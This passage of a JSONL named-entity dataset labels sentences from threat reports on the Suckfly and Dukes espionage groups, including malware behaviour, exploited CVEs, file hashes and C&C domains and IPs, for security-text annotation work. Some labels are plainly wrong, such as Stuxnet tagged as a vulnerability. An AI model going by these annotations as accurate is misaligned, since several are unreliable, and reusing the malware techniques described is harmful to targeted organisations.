"label": "Vulnerability"}, {"start": 209, "end": 218, "label": "Organization"}, {"start": 219, "end": 226, "label": "System"}]} {"text": "This exploit is triggered when a potential victim browses to a malicious page using Internet Explorer , which can allow the attacker to execute code with the same privileges as the currently logged-in user .", "spans": [{"start": 84, "end": 101, "label": "System"}]} {"text": "Once exploitation has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": [{"start": 38, "end": 45, "label": "Malware"}, {"start": 130, "end": 134, "label": "Indicator"}]} {"text": "The threat then executes \u201c svchost.exe \u201d , a PE file , which is actually a clean tool known as OLEVIEW.EXE .", "spans": [{"start": 27, "end": 38, "label": "Indicator"}, {"start": 45, "end": 47, "label": "System"}, {"start": 95, "end": 106, "label": "Indicator"}]} {"text": "The executable will then load iviewers.dll , which is normally a clean , legitimate file .", "spans": [{"start": 30, "end": 42, "label": "Indicator"}]} {"text": "Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": [{"start": 87, "end": 99, "label": "Indicator"}, {"start": 118, "end": 121, "label": "System"}]} {"text": "This technique is associated with the Korplug S-MAL/Plug-x malware and is frequently used in China based cyberespionage activity .", "spans": [{"start": 38, "end": 58, "label": "Malware"}]} {"text": "Suckfly isn\u2019t the only attack group to use certificates to sign malware but they may be the most prolific collectors of them .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "After all , Stuxnet , widely regarded as the world \u2019s first known cyberweapon , was signed using stolen certificates from companies 
based in Taiwan with dates much earlier than Suckfly .", "spans": [{"start": 12, "end": 19, "label": "Vulnerability"}, {"start": 177, "end": 184, "label": "Organization"}]} {"text": "Other cyberespionage groups , including Black Vine and Hidden Lynx , have also used stolen certificates in their campaigns .", "spans": [{"start": 40, "end": 50, "label": "Organization"}, {"start": 55, "end": 66, "label": "Organization"}]} {"text": "In April 2013 , a third-party vendor published a report about a cyberespionage group using custom malware and stolen certificates in their operations .", "spans": []} {"text": "The report documented an advanced threat group they attributed to China .", "spans": []} {"text": "Symantec tracks the group behind this activity as Blackfly and detects the malware they use as Backdoor.Winnti .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 50, "end": 58, "label": "Organization"}, {"start": 95, "end": 110, "label": "Malware"}]} {"text": "The Blackfly attacks share some similarities with the more recent Suckfly attacks .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 66, "end": 73, "label": "Organization"}]} {"text": "Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]} {"text": "The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry .", "spans": [{"start": 17, "end": 25, "label": "Organization"}]} {"text": "Another similarity is that Suckfly stole a certificate from Company D ( see Figure 4 ) less than two years after Blackfly had stolen a certificate from the same company .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 113, "end": 121, "label": "Organization"}]} {"text": "While the stolen certificates were different , and stolen in separate instances , they were both 
used with custom malware in targeted attacks originating from China .", "spans": []} {"text": "Signing malware with code-signing certificates is becoming more common , as seen in this investigation and the other attacks we have discussed .", "spans": []} {"text": "Attackers are taking the time and effort to steal certificates because it is becoming necessary to gain a foothold on a targeted computer .", "spans": []} {"text": "Attempts to sign malware with code-signing certificates have become more common as the Internet and security systems have moved towards a more trust and reputation oriented model .", "spans": []} {"text": "This means that untrusted software may not be allowed to run unless it is signed .", "spans": []} {"text": "As we noted in our previous research on the Apple threat landscape , some operating systems , such as Mac OS X , are configured by default to only allow applications to run if they have been signed with a valid certificate , meaning they are trusted .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 102, "end": 110, "label": "System"}]} {"text": "However , using valid code-signing certificates stolen from organizations with a positive reputation can allow attackers to piggyback on that company \u2019s trust , making it easier to slip by these defenses and gain access to targeted computers .", "spans": []} {"text": "Suckfly paints a stark picture of where cyberattack groups and cybercriminals are focusing their attentions .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Our investigation shines a light on an often unknown and seedier secret life of code-signing certificates , which is completely unknown to their owners .", "spans": []} {"text": "The implications of this study show that certificate owners need to keep a careful eye on them to prevent them from falling into the wrong hands .", "spans": []} {"text": "It is important to give certificates the protection they need so they 
can't be used maliciously .", "spans": []} {"text": "The certificates are only as secure as the safeguards that organizations put around them .", "spans": []} {"text": "Once a certificate has been compromised , so has the reputation of the organization who signed it .", "spans": []} {"text": "An organization whose certificate has been stolen and used to sign malware will always be associated with that activity .", "spans": []} {"text": "Symantec monitors for this type of activity to help prevent organizations from being tied to malicious actions undertaken with their stolen certificates .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]} {"text": "During the course of this investigation , we ensured that all certificates compromised by Suckfly were revoked and the affected companies notified .", "spans": [{"start": 90, "end": 97, "label": "Organization"}]} {"text": "Over the past few years , we have seen a number of advanced threats and cybercrime groups who have stolen code-signing certificates .", "spans": []} {"text": "In all of the cases involving an advanced threat , the certificates were used to disguise malware as a legitimate file or application .", "spans": []} {"text": "File hashes :", "spans": []} {"text": "05edd53508c55b9dd64129e944662c0d 1cf5ce3e3ea310b0f7ce72a94659ff54 352eede25c74775e6102a095fb49da8c 3b595d3e63537da654de29dd01793059 4709395fb143c212891138b98460e958 50f4464d0fc20d1932a12484a1db4342 96c317b0b1b14aadfb5a20a03771f85f ba7b1392b799c8761349e7728c2656dd de5057e579be9e3c53e50f97a9b1832b e7d92039ffc2f07496fe7657d982c80f e864f32151d6afd0a3491f432c2bb7a2 .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}, {"start": 33, "end": 65, "label": "Indicator"}, {"start": 66, "end": 98, "label": "Indicator"}, {"start": 99, "end": 131, "label": "Indicator"}, {"start": 132, "end": 164, "label": "Indicator"}, {"start": 165, "end": 197, "label": "Indicator"}, {"start": 198, "end": 230, "label": "Indicator"}, {"start": 231, "end": 263, 
"label": "Indicator"}, {"start": 264, "end": 296, "label": "Indicator"}, {"start": 297, "end": 329, "label": "Indicator"}, {"start": 330, "end": 362, "label": "Indicator"}]} {"text": "Infrastructure :", "spans": []} {"text": "usv0503.iqservs-jp.com aux.robertstockdill.com fli.fedora-dns-update.com bss.pvtcdn.com ssl.microsoft-security-center.com ssl.2upgrades.com 133.242.134.121 fli.fedora-dns-update.com .", "spans": [{"start": 0, "end": 22, "label": "Indicator"}, {"start": 23, "end": 46, "label": "Indicator"}, {"start": 47, "end": 72, "label": "Indicator"}, {"start": 73, "end": 87, "label": "Indicator"}, {"start": 88, "end": 121, "label": "Indicator"}, {"start": 122, "end": 139, "label": "Indicator"}, {"start": 140, "end": 155, "label": "Indicator"}, {"start": 156, "end": 181, "label": "Indicator"}]} {"text": "Indian organizations targeted in Suckfly attacks .", "spans": [{"start": 33, "end": 40, "label": "Organization"}]} {"text": "In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates .", "spans": [{"start": 16, "end": 24, "label": "Organization"}, {"start": 45, "end": 52, "label": "Organization"}]} {"text": "Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly .", "spans": [{"start": 123, "end": 130, "label": "Organization"}]} {"text": "The attacks targeted high-profile targets , including government and commercial organizations .", "spans": []} {"text": "These attacks occurred in several different countries , but our investigation revealed that the primary targets were individuals and organizations primarily located in India .", "spans": []} {"text": "While there have been several Suckfly campaigns that infected organizations with the group \u2019s custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than 
targets in other regions .", "spans": [{"start": 30, "end": 37, "label": "Organization"}, {"start": 109, "end": 125, "label": "Malware"}]} {"text": "This suggests that these attacks were part of a planned operation against specific targets in India .", "spans": []} {"text": "The first known Suckfly campaign began in April of 2014 .", "spans": [{"start": 16, "end": 23, "label": "Organization"}]} {"text": "During our investigation of the campaign , we identified a number of global targets across several industries who were attacked in 2015 .", "spans": []} {"text": "Many of the targets we identified were well known commercial organizations located in India .", "spans": []} {"text": "These organizations included :", "spans": []} {"text": "One of India 's largest financial organizations A large e-commerce company The e-commerce company 's primary shipping vendor One of India 's top five IT firms A United States healthcare provider 's Indian business unit Two government organizations .", "spans": []} {"text": "Suckfly spent more time attacking the government networks compared to all but one of the commercial targets .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Additionally , one of the two government organizations had the highest infection rate of the Indian targets .", "spans": []} {"text": "Figure 1 shows the infection rate for each of the targets .", "spans": []} {"text": "Indian government org #2 is responsible for implementing network software for different ministries and departments within India 's central government .", "spans": []} {"text": "The high infection rate for this target is likely because of its access to technology and information related to other Indian government organizations .", "spans": []} {"text": "Suckfly 's attacks on government organizations that provide information technology services to other government branches are not limited to India .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "It 
has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have .", "spans": []} {"text": "Suckfly 's targets are displayed in figure 2 by their industry , which provides a clearer view of the group \u2019s operations .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Most of the group 's attacks are focused on government or technology related companies and organizations .", "spans": []} {"text": "One of the attacks we investigated provided detailed insight into how Suckfly conducts its operations .", "spans": [{"start": 70, "end": 77, "label": "Organization"}]} {"text": "In 2015 , Suckfly conducted a multistage attack between April 22 and May 4 against an e-commerce organization based in India .", "spans": [{"start": 10, "end": 17, "label": "Organization"}]} {"text": "Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts .", "spans": [{"start": 31, "end": 38, "label": "Organization"}, {"start": 48, "end": 55, "label": "Malware"}]} {"text": "The tools and malware used in this breach were also signed with stolen digital certificates .", "spans": []} {"text": "Suckfly 's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company 's internal network .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "We don't have hard evidence of how Suckfly obtained information on the targeted user , but we did find a large open-source presence on the initial target .", "spans": [{"start": 35, "end": 42, "label": "Organization"}]} {"text": "The target 's job function , corporate email address , information on work related projects , and publicly accessible personal blog could all be freely found online .", "spans": [{"start": 39, "end": 44, "label": "System"}]} {"text": "On April 22 , 2015 , Suckfly exploited a vulnerability on the 
targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack .", "spans": [{"start": 21, "end": 28, "label": "Organization"}, {"start": 102, "end": 109, "label": "System"}, {"start": 153, "end": 173, "label": "System"}, {"start": 190, "end": 197, "label": "Malware"}]} {"text": "While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector .", "spans": []} {"text": "Based on the amount of open-source information available on the target , it is feasible that a spear-phishing email may have been used .", "spans": [{"start": 110, "end": 115, "label": "System"}]} {"text": "After the attackers successfully exploited the employee \u2019s system , they gained access to the e-commerce company 's internal network .", "spans": []} {"text": "We found evidence that Suckfly used hacktools to move laterally and escalate privileges .", "spans": [{"start": 23, "end": 30, "label": "Organization"}]} {"text": "To do this , the attackers used a signed credential-dumping tool to obtain the victim 's account credentials .", "spans": []} {"text": "With the account credentials , the attackers were able to access the victim 's account and navigate the internal corporate network as though they were the employee .", "spans": []} {"text": "On April 27 , the attackers scanned the corporate internal network for hosts with ports 8080 , 5900 , and 40 open .", "spans": []} {"text": "Ports 8080 and 5900 are common ports used with legitimate protocols , but can be abused by attackers when they are not secured .", "spans": []} {"text": "It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port .", "spans": []} {"text": "Based on Suckfly scanning for common ports , it \u2019s clear that the group was looking to expand its foothold on the e-commerce company 's internal 
network .", "spans": [{"start": 9, "end": 16, "label": "Organization"}]} {"text": "The attackers \u2019 final step was to exfiltrate data off the victim \u2019s network and onto Suckfly \u2019s infrastructure .", "spans": [{"start": 85, "end": 92, "label": "Organization"}]} {"text": "While we know that the attackers used the Nidiran back door to steal information about the compromised organization , we do not know if Suckfly was successful in stealing other information .", "spans": [{"start": 42, "end": 49, "label": "Malware"}, {"start": 136, "end": 143, "label": "Organization"}]} {"text": "These steps were taken over a 13-day period , but only on specific days .", "spans": []} {"text": "While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday .", "spans": [{"start": 37, "end": 44, "label": "Organization"}]} {"text": "There was no activity from the group on weekends .", "spans": []} {"text": "We were able to determine this because the attackers \u2019 hacktools are command line driven and can provide insight into when the operators are behind keyboards actively working .", "spans": []} {"text": "Figure 4 shows the attackers \u2019 activity levels throughout the week .", "spans": []} {"text": "Suckfly made its malware difficult to analyze to prevent their operations from being detected .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "However , we were able to successfully analyze Suckfly malware samples and extract some of the communications between the Nidiran back door and the Suckfly command and control ( C&C ) domains .", "spans": [{"start": 47, "end": 54, "label": "Organization"}, {"start": 122, "end": 129, "label": "Malware"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 156, "end": 175, "label": "System"}, {"start": 178, "end": 181, "label": "System"}]} {"text": "We analyzed the dropper , which is an executable that contains the following 
three files :", "spans": [{"start": 16, "end": 23, "label": "System"}]} {"text": "dllhost.exe : The main host for the .dll file . iviewers.dll : Used to load encrypted payloads and then decrypt them . msfled : The encrypted payload .", "spans": [{"start": 0, "end": 11, "label": "Indicator"}, {"start": 36, "end": 40, "label": "Indicator"}, {"start": 48, "end": 60, "label": "Indicator"}]} {"text": "All three files are required for the malware to run correctly .", "spans": []} {"text": "Once the malware has been executed , it checks to see if it has a connection to the internet before running .", "spans": []} {"text": "If the connection test is successful , the malware runs and attempts to communicate with the C&C domain over ports 443 and 8443 .", "spans": [{"start": 93, "end": 96, "label": "System"}]} {"text": "In the samples we analyzed we found the port and C&C information encrypted and hardcoded into the Nidiran malware itself .", "spans": [{"start": 49, "end": 52, "label": "System"}, {"start": 98, "end": 105, "label": "Malware"}]} {"text": "The key for the RC4 encryption in this sample is the hardcoded string \u201c h0le \u201d .", "spans": []} {"text": "Once the cookie data is decoded , Suckfly has the network name , hostname , IP address , and the victim 's operating system information .", "spans": [{"start": 34, "end": 41, "label": "Organization"}, {"start": 76, "end": 78, "label": "Indicator"}]} {"text": "Information about the C&C infrastructure identified in our analysis of Suckfly activity can be seen in Table 1 .", "spans": [{"start": 22, "end": 25, "label": "System"}, {"start": 71, "end": 78, "label": "Organization"}]} {"text": "Domain Registration IP address Registration date", "spans": [{"start": 20, "end": 22, "label": "Indicator"}]} {"text": "aux.robertstockdill.com kumar.pari@yandex.com Unknown April 1 , 2014 . ssl.2upgrades.com kumar.pari@yandex.com 176.58.96.234 July 5 , 2014 . 
bss.pvtcdn.com registrar@mail.zgsj.com 106.184.1.38 May 19 , 2015 .", "spans": [{"start": 0, "end": 23, "label": "Indicator"}, {"start": 24, "end": 45, "label": "Indicator"}, {"start": 71, "end": 88, "label": "Indicator"}, {"start": 89, "end": 110, "label": "Indicator"}, {"start": 111, "end": 124, "label": "Indicator"}, {"start": 141, "end": 155, "label": "Indicator"}, {"start": 156, "end": 179, "label": "Indicator"}, {"start": 180, "end": 192, "label": "Indicator"}]} {"text": "ssl.microsoft-security-center.com Whoisguard Unknown July 20 , 2015 E-TIME.usv0503.iqservs-jp.com Domain@quicca.com 133.242.134.121 August 18 , 2014 .", "spans": [{"start": 0, "end": 33, "label": "Indicator"}, {"start": 34, "end": 44, "label": "System"}, {"start": 63, "end": 97, "label": "Indicator"}, {"start": 98, "end": 115, "label": "Indicator"}, {"start": 116, "end": 131, "label": "Indicator"}]} {"text": "fli.fedora-dns-update.com Whoisguard Unknown Unknown .", "spans": [{"start": 0, "end": 25, "label": "Indicator"}, {"start": 26, "end": 36, "label": "System"}]} {"text": "Suckfly targeted one of India \u2019s largest e-commerce companies , a major Indian shipping company , one of India \u2019s largest financial organizations , and an IT firm that provides support for India \u2019s largest stock exchange .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "All of these targets are large corporations that play a major role in India \u2019s economy .", "spans": []} {"text": "By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy .", "spans": [{"start": 51, "end": 58, "label": "Organization"}]} {"text": "While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction .", "spans": []} {"text": "Suckfly has the resources to develop malware , purchase infrastructure , and conduct targeted attacks for 
years while staying off the radar of security organizations .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations .", "spans": [{"start": 117, "end": 152, "label": "Organization"}]} {"text": "There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": [{"start": 26, "end": 33, "label": "Organization"}]} {"text": "The nature of the Suckfly attacks suggests that it is unlikely that the threat group orchestrated these attacks on their own .", "spans": [{"start": 18, "end": 25, "label": "Organization"}]} {"text": "We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations .", "spans": [{"start": 16, "end": 23, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}]} {"text": "THE DUKES 7 YEARS OF RUSSIAN CYBERESPIONAGE .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "TOOLS AND TECHNIQUES OF THE DUKES .", "spans": [{"start": 28, "end": 33, "label": "Organization"}]} {"text": "PINCHDUKE : First known activity November 2008 , Most recent known activity Summer 2010 , C&C communication methods HTTP(S) , Known toolset components Multiple loaders , Information stealer .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 90, "end": 93, "label": "System"}, {"start": 116, "end": 123, "label": "Indicator"}, {"start": 160, "end": 167, "label": "System"}, {"start": 170, "end": 189, "label": "System"}]} {"text": "The PinchDuke toolset consists of multiple loaders and a core information stealer Trojan .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 43, "end": 50, "label": 
"System"}, {"start": 62, "end": 81, "label": "System"}, {"start": 82, "end": 88, "label": "Malware"}]} {"text": "The loaders associated with the PinchDuke toolset have also been observed being used with CosmicDuke .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 32, "end": 41, "label": "Malware"}, {"start": 90, "end": 100, "label": "Malware"}]} {"text": "The PinchDuke information stealer gathers system configuration information , steals user credentials , and collects user files from the compromised host transferring these via HTTP (S ) to a C&C server .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 14, "end": 33, "label": "System"}, {"start": 176, "end": 185, "label": "Indicator"}, {"start": 191, "end": 194, "label": "System"}]} {"text": "We believe PinchDuke \u2019s credential stealing functionality is based on the source code of the Pinch credential stealing malware ( also known as LdPinch ) that was developed in the early 2000s and has later been openly distributed on underground forums .", "spans": [{"start": 11, "end": 20, "label": "Malware"}, {"start": 93, "end": 98, "label": "System"}, {"start": 143, "end": 150, "label": "Malware"}]} {"text": "Credentials targeted by PinchDuke include ones associated with the following software or services : The Bat! , Yahoo! 
, Mail.ru , Passport.Net , Google Talk , Netscape Navigator , Mozilla Firefox , Mozilla Thunderbird , Internet Explorer , Microsoft Outlook , WinInet Credential Cache , Lightweight Directory Access Protocol ( LDAP ) .", "spans": [{"start": 24, "end": 33, "label": "Malware"}, {"start": 104, "end": 108, "label": "System"}, {"start": 111, "end": 117, "label": "System"}, {"start": 120, "end": 127, "label": "Indicator"}, {"start": 130, "end": 142, "label": "Indicator"}, {"start": 145, "end": 156, "label": "System"}, {"start": 159, "end": 177, "label": "System"}, {"start": 180, "end": 195, "label": "System"}, {"start": 198, "end": 217, "label": "System"}, {"start": 220, "end": 237, "label": "System"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 250, "end": 257, "label": "System"}, {"start": 260, "end": 284, "label": "System"}, {"start": 287, "end": 324, "label": "System"}, {"start": 327, "end": 331, "label": "System"}]} {"text": "PinchDuke will also search for files that have been created within a predefined timeframe and whose file extension is present in a predefined list .", "spans": [{"start": 0, "end": 9, "label": "Malware"}]} {"text": "As a curiosity , most PinchDuke samples contain a Russian language error message : \u201c There is an error in the module \u2019s name ! 
The length of the data section name must be 4 bytes \u201d .", "spans": [{"start": 22, "end": 31, "label": "Malware"}]} {"text": "GEMINIDUKE : First known activity January 2009 , Most recent known activity December 2012 , C&C communication methods HTTP(S) , Known toolset components Loader , Information stealer , Multiple persistence components .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 92, "end": 95, "label": "System"}, {"start": 118, "end": 125, "label": "Indicator"}, {"start": 153, "end": 159, "label": "System"}, {"start": 162, "end": 181, "label": "System"}, {"start": 184, "end": 215, "label": "System"}]} {"text": "The GeminiDuke toolset consists of a core information stealer , a loader and multiple persistencerelated components .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 42, "end": 61, "label": "System"}, {"start": 66, "end": 72, "label": "System"}, {"start": 77, "end": 115, "label": "System"}]} {"text": "Unlike CosmicDuke and PinchDuke , GeminiDuke primarily collects information on the victim computer \u2019s configuration .", "spans": [{"start": 7, "end": 17, "label": "Malware"}, {"start": 22, "end": 31, "label": "Malware"}, {"start": 34, "end": 44, "label": "Malware"}]} {"text": "The collected details include : Local user accounts , Network settings , Internet proxy settings , Installed drivers , Running processes , Programs previously executed by users , Programs and services configured to automatically run at startup , Values of environment variables , Files and folders present in any users home folder , Files and folders present in any users My Documents , Programs installed to the Program Files folder , Recently accessed files , folders and programs .", "spans": []} {"text": "As is common for malware , the GeminiDuke infostealer uses a mutex to ensure that only one instance of itself is running at a time .", "spans": [{"start": 31, "end": 41, "label": "Malware"}, {"start": 42, "end": 53, "label": 
"System"}]} {"text": "What is less common is that the name used for the mutex is often a timestamp .", "spans": []} {"text": "We believe these timestamps to be generated during the compilation of GeminiDuke from the local time of the computer being used .", "spans": [{"start": 70, "end": 80, "label": "Malware"}]} {"text": "Comparing the GeminiDuke compilation timestamps , which always reference the time in the UTC+0 timezone , with the local time timestamps used as mutex names , and adjusting for the presumed timezone difference , we note that all of the mutex names reference a time and date that is within seconds of the respective sample \u2019s compilation timestamp .", "spans": [{"start": 14, "end": 24, "label": "Malware"}]} {"text": "Additionally , the apparent timezone of the timestamps in all of the GeminiDuke samples compiled during the winter is UTC+3 , while for samples compiled during the summer , it is UTC+4 .", "spans": [{"start": 69, "end": 79, "label": "Malware"}]} {"text": "The observed timezones correspond to the pre-2011 definition of Moscow Standard Time ( MSK ) , which was UTC+3 during the winter and UTC+4 during the summer .", "spans": []} {"text": "In 2011 MSK stopped following Daylight Saving Time ( DST ) and was set to UTC+4 year-round , then reset to UTC +3 yearround in 2014 .", "spans": []} {"text": "Some of the observed GeminiDuke samples that used timestamps as mutex names were compiled while MSK still respected DST and for these samples , the timestamps perfectly align with MSK as it was defined at the time .", "spans": [{"start": 21, "end": 31, "label": "Malware"}]} {"text": "However , GeminiDuke samples compiled after MSK was altered still vary the timezone between UTC+3 in the winter and UTC+4 during the summer .", "spans": [{"start": 10, "end": 20, "label": "Malware"}]} {"text": "While computers using Microsoft Windows automatically adjust for DST , changes in timezone definitions require that an update to Windows be installed .", 
"spans": [{"start": 22, "end": 31, "label": "Organization"}, {"start": 32, "end": 39, "label": "System"}, {"start": 129, "end": 136, "label": "System"}]} {"text": "We therefore believe that the Dukes group simply failed to update the computer they were using to compile GeminiDuke samples , so that the timestamps seen in later samples still appear to follow the old definition of Moscow Standard Time .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 106, "end": 116, "label": "Malware"}]} {"text": "The GeminiDuke infostealer has occasionally been wrapped with a loader that appears to be unique to GeminiDuke and has never been observed being used with any of the other Duke toolsets .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 100, "end": 110, "label": "Malware"}, {"start": 172, "end": 176, "label": "Organization"}]} {"text": "GeminiDuke also occasionally embeds additional executables that attempt to achieve persistence on the victim computer .", "spans": [{"start": 0, "end": 10, "label": "Malware"}]} {"text": "These persistence components appear to be uniquely customized for use with GeminiDuke , but they use many of the same techniques as CosmicDuke persistence components .", "spans": [{"start": 75, "end": 85, "label": "Malware"}, {"start": 132, "end": 142, "label": "Malware"}]} {"text": "COSMICDUKE : First known activity January 2010 , Most recent known activity Summer 2015 , Other names Tinybaron , BotgenStudios , NemesisGemina , C&C communication methods HTTP(S) , FTP , WebDav , Known toolset components Information stealer , Multiple loaders , Privilege escalation component , Multiple persistence components .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 114, "end": 127, "label": "Malware"}, {"start": 130, "end": 143, "label": "Malware"}, {"start": 146, "end": 149, "label": "System"}, {"start": 172, "end": 179, "label": "Indicator"}, {"start": 182, 
"end": 185, "label": "Indicator"}, {"start": 188, "end": 194, "label": "Indicator"}, {"start": 222, "end": 241, "label": "System"}, {"start": 253, "end": 260, "label": "System"}]} {"text": "The CosmicDuke toolset is designed around a main information stealer component .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 49, "end": 68, "label": "System"}]} {"text": "This information stealer is augmented by a variety of components that the toolset operators may selectively include with the main component to provide additional functionalities , such as multiple methods of establishing persistence , as well as modules that attempt to exploit privilege escalation vulnerabilities in order to execute CosmicDuke with higher privileges .", "spans": [{"start": 5, "end": 24, "label": "System"}, {"start": 335, "end": 345, "label": "Malware"}]} {"text": "CosmicDuke \u2019s information stealing functionality includes : Keylogging , Taking screenshots , Stealing clipboard contents , Stealing user files with file extensions that match a predefined list , Exporting the users cryptographic certificates including private keys , Collecting user credentials , including passwords , for a variety of popular chat and email programs as well as from web browsers CosmicDuke may use HTTP , HTTPS , FTP or WebDav to exfiltrate the collected data to a hardcoded C&C server .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 354, "end": 359, "label": "System"}, {"start": 398, "end": 408, "label": "Malware"}, {"start": 417, "end": 421, "label": "Indicator"}, {"start": 424, "end": 429, "label": "Indicator"}, {"start": 432, "end": 435, "label": "Indicator"}, {"start": 439, "end": 445, "label": "Indicator"}, {"start": 494, "end": 497, "label": "System"}]} {"text": "While we believe CosmicDuke to be an entirely custom- written toolset with no direct sharing of code with other Duke toolsets , the high-level ways in which many of its features have been implemented appear 
to be shared with other members of the Duke arsenal .", "spans": [{"start": 17, "end": 27, "label": "Malware"}, {"start": 112, "end": 116, "label": "Organization"}, {"start": 246, "end": 250, "label": "Organization"}]} {"text": "Specifically , the techniques CosmicDuke uses to extract user credentials from targeted software and to detect the presence of analysis tools appear to be based on the techniques used by PinchDuke .", "spans": [{"start": 30, "end": 40, "label": "Malware"}, {"start": 187, "end": 196, "label": "Malware"}]} {"text": "Likewise , many of CosmicDuke \u2019s persistence components use techniques also used by components associated with GeminiDuke and CozyDuke .", "spans": [{"start": 19, "end": 29, "label": "Malware"}, {"start": 111, "end": 121, "label": "Malware"}, {"start": 126, "end": 134, "label": "Malware"}]} {"text": "In all of these cases , the techniques are the same , but the code itself has been altered to work with the toolset in question , leading to small differences in the final implementation .", "spans": []} {"text": "A few of the CosmicDuke samples we discovered also included components that attempt to exploit either of the publicly known CVE-2010-0232 or CVE-2010- 4398 privilege escalation vulnerabilities .", "spans": [{"start": 13, "end": 23, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 141, "end": 155, "label": "Vulnerability"}]} {"text": "In the case of CVE-2010-0232 , the exploit appears to be based directly on the proof of concept code published by security researcher Tavis Ormandy when he disclosed the vulnerability .", "spans": [{"start": 15, "end": 28, "label": "Vulnerability"}]} {"text": "We believe that the exploit for CVE- 2010-4398 was also based on a publicly available proof of concept .", "spans": [{"start": 32, "end": 46, "label": "Vulnerability"}]} {"text": "In addition to often embedding persistence or privilege escalation components , CosmicDuke has occasionally embedded 
PinchDuke , GeminiDuke , or MiniDuke components .", "spans": [{"start": 80, "end": 90, "label": "Malware"}, {"start": 117, "end": 126, "label": "Malware"}, {"start": 129, "end": 139, "label": "Malware"}, {"start": 145, "end": 153, "label": "Malware"}]} {"text": "It should be noted that CosmicDuke does not interoperate with the second , embedded malware in any way other than by writing the malware to disk and executing it .", "spans": [{"start": 24, "end": 34, "label": "Malware"}]} {"text": "After that , CosmicDuke and the second malware operate entirely independently of each other , including separately contacting their C&C servers .", "spans": [{"start": 13, "end": 23, "label": "Malware"}, {"start": 132, "end": 135, "label": "System"}]} {"text": "Sometimes , both malware have used the same C&C server , but in other cases , even the servers have been different .", "spans": [{"start": 44, "end": 47, "label": "System"}]} {"text": "Finally , it is worth noting that while most of the compilation timestamps for CosmicDuke samples appear to be authentic , we are aware of a few cases of them being forged .", "spans": [{"start": 79, "end": 89, "label": "Malware"}]} {"text": "One such case was detailed on page 10 as an apparent evasion attempt .", "spans": []} {"text": "Another is a loader variant seen during the spring of 2010 in conjunction with both CosmicDuke and PinchDuke .", "spans": [{"start": 13, "end": 19, "label": "System"}, {"start": 84, "end": 94, "label": "Malware"}, {"start": 99, "end": 108, "label": "Malware"}]} {"text": "These loader samples all had compilation timestamps purporting to be from the 24th or the 25th of September , 2001 .", "spans": [{"start": 6, "end": 12, "label": "System"}]} {"text": "However , many of these loader samples embed CosmicDuke variants that exploit the CVE-2010- 0232 privilege escalation vulnerability thus making it impossible for the compilation timestamps to be authentic .", "spans": [{"start": 45, "end": 55, "label": 
